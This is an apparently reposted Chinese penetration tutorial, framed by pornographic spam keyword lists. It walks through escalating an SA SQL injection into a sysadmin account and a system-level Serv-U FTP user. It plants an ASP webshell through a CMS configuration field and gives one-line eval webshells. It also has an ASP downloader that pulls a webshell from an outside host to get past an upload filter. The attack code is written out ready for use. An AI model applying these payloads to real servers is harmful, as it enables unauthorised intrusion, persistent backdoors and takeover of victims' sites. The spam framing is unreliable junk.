六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

幾個經典入侵技巧

[摘要]這期這篇文章呢其實是比較雜亂的, 所以我也不知道題目要用什么好, 不過相信我, 這篇文章看完之后你一定會學到很多新的在滲透過程中思路, OK, 跟我來吧!  一、SQL server的靈活應用  我...
這期這篇文章呢其實是比較雜亂的, 所以我也不知道題目要用什么好, 不過相信我, 這篇文章看完之后你一定會學到很多新的在滲透過程中思路, OK, 跟我來吧!

  一、SQL server的靈活應用

  我們知道在滲透過程中思路是最重要的, 有時候往往一個細節就決定成敗。 呵呵, 不過理論終究是理論, 看過我以前文章的朋友一定知道, 我更喜歡以一個事例來講解一個東西。 因為我只是講一個思路的問題, 所以就不會寫很多, 只寫經典的部分, 如果大家需要的話以后我會單獨寫一篇滲透的文章, 來詳細介紹每一個方法的使用。 OK, 我們開始吧!

  話說前幾天朋友丟給我一個SA的注射點.但是死活就是不能執行命令。 說問我能不能幫忙看看。 既然朋友說話了并且據說是非常BT的SA, 自己也愿意挑戰下。 拿到地址后首先telnet一下它的1433。 呵呵, 這個可能很多朋友就不會注意為什么要先telnet呢?因為是SA嘛, 只要能telnet上去我們就可以在注射點那里執行命令。 加一個具有SA權限的sql用戶上去, 這樣在查詢分析器里執行命令要比在注射點那里方便的多呢。 使用●telnet 61.129.251. x 1433 ●發現可以telnet上去. OK 馬上在注射點后面執行:

  ★

  exec master.dbo.sp_addlogin fishing hook;

  exec master.dbo.sp_addsrvrolemember fishing,sysadmin

  ★

  這個命令就是添加一個用戶名為fishing密碼為hook的SQL用戶, 權限為SA。 兩次執行頁面都返回成功, 說明用戶添加成功了。 使用SQL server的查詢分析器連上, 然后執行exec master.dbo.xp_cmdshell ’net user’ 發現提示錯誤:

  ★

  錯誤消息

  50001, 級別 1, 狀態 50001

  xpsql.cpp: 錯誤 5 來自 CreateProcess(第 737 行)

  ★

  很多朋友問過我這個錯誤信息是什么意思, 這里解釋一下, 其實很簡單, 那個錯誤是明明寫著 CreateProcess 進程無法創建,而xp_cmdshell 是執行什么進程大家應該知道吧, CMD這個進程無法創建!有可能CMD設置權限拒絕SYSTEM訪問, 有可能是CMD刪除或者改名。 以上情況都可以造成 CMD進程無法創建的, 如圖1。

  圖1

  看來直接想加用戶登陸服務器是不可能了, 可能有的朋友會說:不是還有SP_OAcreate 么?但是我在使用SP_OAcreate執行:

  ★

  DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD

  @shell,’run’,null, ’C:WINdowssystem32cmd.exe /c net user fish sadfish /add’

  ★

  的時候雖然提示執行成功, 但是卻發現用戶并沒有添加進去, 初步估計應該是wscript.shell被刪掉了。

  另外如果xp_regwrite 這個存儲在的話我們還可以用沙盒模式搞定他的。 不過雖然以上三個重要的存儲過程都不能用, 但是我們還可以用xp_subdirs來列目錄。 在列到D盤的時候發現了服務器裝有serv-u, 聰明的朋友們是不是想到了什么?我們可以通過使用FSO在suer-v的●ServUDaemon.ini●里寫配置信息 添加一個具有system權限的ftp用戶, 說做就做, 首先使用

  ★

  declare @o int, @f int, @t int, @ret int

  declare @line varchar(8000)

  exec sp_oacreate ’scripting.filesystemobject’, @o out

  exec sp_oamethod @o, ’opentextfile’, @f out, ’d:Serv-U6.3ServUDaemon.ini’, 1

  exec @ret = sp_oamethod @f, ’readline’, @line out

  while( @ret = 0 )

  begin

  print @line

  exec @ret = sp_oamethod @f, ’readline’, @line out

  end

  ★

  這段代碼的意思是通過使用存儲過程來讀取d:Serv-U6.3ServUDaemon.ini里的配置信息, 返回執行成功 如圖2

  圖片看不清楚?請點擊這里查看原圖(大圖)。

  既然可以讀了 那么我們是不是可以寫一個進去?繼續執行

  ★

  declare @o int, @f int, @t int, @ret int

  exec sp_oacreate ’scripting.filesystemobject’, @o out

  exec sp_oamethod @o, ’createtextfile’, @f out, ’d:Serv-U6.3ServUDaemon.ini’,

exec @ret = sp_oamethod @f, ’writeline’, NULL, 《這里添寫自己寫好的SU配置信息, 剛才復制的那些都要寫上去, 在最后添加我們自己的, 跟我們在WEBSHELL里的serv-u提權是一樣的》

  ★

  按F5, 執行一下, 發現命令執行成功, 馬上使用上面的語句復查一下, 發現已經寫進去了, 如圖3。

OK 剩下的事情就不用我多說了吧?FTP上去, 直接添加用戶登陸服務器就OK了, 這里就不多廢話了。 怎么樣?發現了吧?在滲透過程中只要細心+靈活的運用知識就可以完美的達到效果啦。

  二、網站配置文件插馬

  MY動力管理系統相信很多朋友都玩過吧?但是他的后臺可是有點BT。 雖然有數據庫備份但是并不支持自定義路徑, 而且數據庫里還有

  <% loop <% 不能閉和, 所以數據庫備份幾乎是沒什么用了。 不過以前有朋友提出可以先恢復再備份的方法, 不過我沒測試成功。

  這里教大家的方法就是配置文件插馬, 至于怎么進到后臺我就不說, 是注射也好, 下載默認數據庫也好總之能進后臺就OK了。 進到后臺后我們會發現在常規設置, 那里有個網站信息配置, 點開他, 如圖4。

我們看到版權信息那里寫著 "版權所有 Copyright? 2003 <a href=’http://www.asp163.net&;#39;>動力空間</a>" , 這是系統自帶的, 因為這里沒有限制我們輸入的字符長度所以我們就可以在這里傳一個類似小馬的東西。 注意是類似, 而不是小馬(編輯點評:其實就是個小馬。 ), 直接在版權信息那里進行替換, 前面要加上他原有的語句, 替換代碼如下:

  ★

  版權所有 Copyright? 2003 <a href=’http://www.asp163.net&;#39;>動力空間</a>" ’版權信息

  if Request("xiaoxin")="520" then

  dim allen,creat,text,thisline,path

  if Request("creat")="yes" then

  Set fs = CreateObject("Scripting.FileSystemObject")

  Set outfile=fs.CreateTextFile(server.mappath(Request("path")))

  outfile.WriteLine Request("text")

  Response.write "小新恭喜"

  end if

  Response.write "<form method=’POST’action=’"&Request.ServerVariables("URL")&"?xiaoxin=520&creat=yes’>"

  Response.write "<textarea name=’text’>"&thisline&"</textarea><br>"

  Response.write "<input type=’text’ name=’path’ value=’"&Request("path")&"’>"

  Response.write "<input name=’submit’ type=’submit’ value=’ok’ ></form>"

  Response.end

  end if

  %>

  ★

  然后保存一下, 千萬注意, 這個時候, 千萬別跳轉任何頁面。 直接在ie地址欄內將admin/Admin_Login.asp替換成 inc/config.asp?xiaoxin=520, 有人會問為什么了?因為在上邊版權信息內的代碼, 是一段發送程序, 利用 inc/config.asp相關文件信息所寫。

進入這個頁面之后會發現:這是啥玩意? 好象一個小馬。 那你就當小馬用好了, 上面寫你的ASP木馬代碼, 下面寫上路徑, 如圖5、6。

怎么樣?SHELL拿到了吧, 這里有一點要注意, 雖然SHELL是拿到了但是這個時候網站也掛掉了, 我們需要進到SHELL里找到config.asp文件, 把里面的 "小新恭喜" 去掉, 就OK啦。

  其實不光是MY動力管理系統, 動易文章系統以前也存在這個問題:在站長信箱那里寫入"%><%eval(request("xiaozhi"))%><%’ 然后直接連接

  inc目錄下的config.asp就可以了。 因為很多網站信息都是寫入在config.asp里的, 有空各位朋友可以自己去測試一下(編輯:如果讀者朋友懂ASP可以自己研究一些ASP程序是否在后臺配置文件用到FSO, 這樣基本上就是把配置信息寫到了ASP文件里了)。

  三、突破一流信息監控系統實現文件“上傳”

  相信很多朋友可能遇到過這樣一個問題:在得到一個小馬以后傳大馬的時候服務器卻提示錯誤:很抱歉, 由于您提交的內容中或訪問的內容中含有系統不允許的關鍵詞, 本次操作無效, 系統已記錄您的IP及您提交的所有數據。 請注意, 不要提交任何違反國家規定的內容!本次攔截的相關信息為:98424b88afb8, 如圖7。

本來以為換個大馬就可以了, 但是我換了N個馬都是不行。 我想可能是禁止提交了, 但是隨便提交幾個字都是OK的, 原來是因為它設置了限制提交字符, 只要我們的大馬里包含特殊字符就會被拒絕提交, 不過我們還是有辦法突破他的。

  這個就好比我們上傳EXE文件的時候, 網站禁止了上傳, 但是我們可以采用外部下載的方式來把目標文件下載到本地服務器中。 比如VBS?嘿嘿 好了, 這個方法就是, 只要服務器沒有禁用XML和數據流組件, 我們可以往服務器中提交以下ASP腳本文件, 代碼如下:

  ★

  <%

  Set xPost = CreateObject("Microsoft.XMLHTTP")

  xPost.Open "GET",http://www.hack521.cn/fish.txt,False

  xPost.Send()

  Set sGet = CreateObject("ADODB.Stream")

  sGet.Mode = 3

  sGet.Type = 1

  sGet.Open()

  sGet.Write(xPost.responseBody)

  sGet.SaveToFile Server.MapPath("fish.asp"),2

  set sGet = nothing

  set sPOST = nothing

  %>

  ★

  利用服務器的XML和數據流組件, 從我的blog的fish.txt的內容下載到目標站點根目錄并保存為fish.asp。 fish.txt中的內容當然就是被攔截的內容了, 也就是我們的大馬。 之后訪問這個提交的ASP文件, 會出現一片空白, 然后我們再訪問這個fish.asp文件, 則想要上傳的內容已經被保存成功!如圖8。

怎么樣?親愛的讀者?你學會了沒有?是不是腦子里又多了一條新思路?這期我主要以三個實例來講解一下一些大家都知道但是都不常用的方法。 很多朋友問過我, 為什么我寫的文章里所用的方法家都知道, 為什么就想不到呢?還是那句話, 思路要清晰, 滲透是一個細致活, 不急不躁方能心平。 我的ID是CNSST或者加我

:MSSQL是個強大的數據庫, 能靈活運用其提供給我們的擴展, 就不是一般的高手了;關于配置文件寫馬, 為了寫馬后還能讓網站運行正常, 寫進 Config.asp里的就要是容錯的一句話了, 比如:<%if request("cmd")<>"" then execute request("cmd")%>或者<%on error resume next:execute request("cmd")%>等等;如果你能熟練掌握MS的一些組件運用, 你也是個高手了。


上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。




主站蜘蛛池模板: 四虎影视国产精品永久在线 | 三级aa| 青草草产国视频 | 热伊人99re久久精品最新地 | 四虎a456tncom | 欧美性猛交xxxx乱大交中文 | 亚欧精品一区二区三区四区 | 午夜三级黄色片 | 日韩中文字幕高清在线专区 | 青娱乐视觉盛宴在线视频 | 日日干日日| 青草影院在线观看免费版 | 日韩欧美视频在线 | 亚洲成a人片77777kkkk | 天天影视色香欲综合网小说 | 手机看片日韩国产一区二区 | 日韩一区二区三区四区不卡 | 日本在线免费看片 | 四虎影视免费在线 | 五月婷婷婷婷 | 日韩欧美中字 | 小小的日本在线观看中文 | 欧美在线播放视频 | 色窝窝免费播放视频在线 | 日本v片免费一区二区三区 日本vs欧美一区二区三区 | 欧美亚洲另类一区中文字幕 | 午夜三级国产精品理论三级 | 亚洲精品123区 | 午夜欧美福利视频 | 日韩特级毛片免费观看视频 | 一级aa免费视频毛片 | 日本在线观 | 四虎免费影院4hu永久免费 | 色综合天天综一个色天天综合网 | 欧美丝袜一区二区三区 | 欧美中文在线 | 欧洲精品视频完整版在线 | 日韩黄色影视 | 午夜国产精品久久影院 | 在线观看永久免费视频网站 | 欧美在线视频观看 |